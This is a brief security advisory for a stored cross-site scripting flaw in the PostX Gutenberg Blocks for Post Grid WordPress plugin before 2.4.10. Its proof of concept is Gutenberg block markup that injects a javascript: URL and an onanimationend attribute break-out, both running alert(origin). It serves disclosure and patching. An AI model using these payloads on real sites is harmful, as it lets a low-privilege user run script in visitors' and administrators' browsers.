PostX Gutenberg Blocks for Post Grid < 2.4.10 - Contributor+ Stored Cross-Site Scripting

Proof of Concept

PoC can be entered with code editor the example below uses Taxonomy block; all blocks are vulnerable:

<!-- wp:ultimate-post/ultp-taxonomy {"blockId":"767f9c","headingURL":"javascript:alert(origin)","counterBgColor":{"openColor":1,"type":"color","color":"","gradient":{"color1":"#16d03e","color2":"#1f91f3","type":"linear","direction":"90","start":5,"stop":80,"radial":"center","clip":false},"clip":false},"counterBorder":{"width":{"top":1,"right":1,"bottom":1,"left":1},"type":"solid","color":"#009fd4","openBorder":0},"contentWrapBorder":{"width":{"top":1,"right":1,"bottom":1,"left":1},"type":"solid","color":"#009fd4","openBorder":0},"contentWrapShadow":{"inset":"","width":{"top":1,"right":1,"bottom":1,"left":1},"color":"#009fd4","openShadow":0},"wrapBg":{"openColor":0,"type":"color","color":"#f5f5f5","gradient":{"color1":"#16d03e","color2":"#1f91f3","type":"linear","direction":"90","start":5,"stop":80,"radial":"center","clip":false},"clip":false},"wrapBorder":{"width":{"top":1,"right":1,"bottom":1,"left":1},"type":"solid","color":"#009fd4","openBorder":0},"wrapShadow":{"inset":"","width":{"top":1,"right":1,"bottom":1,"left":1},"color":"#009fd4","openShadow":0},"advanceId":"\u0022 style=\u0022animation-name:twentytwentyone-close-button-transition\u0022 onanimationend=\u0022alert(origin)//"} /-->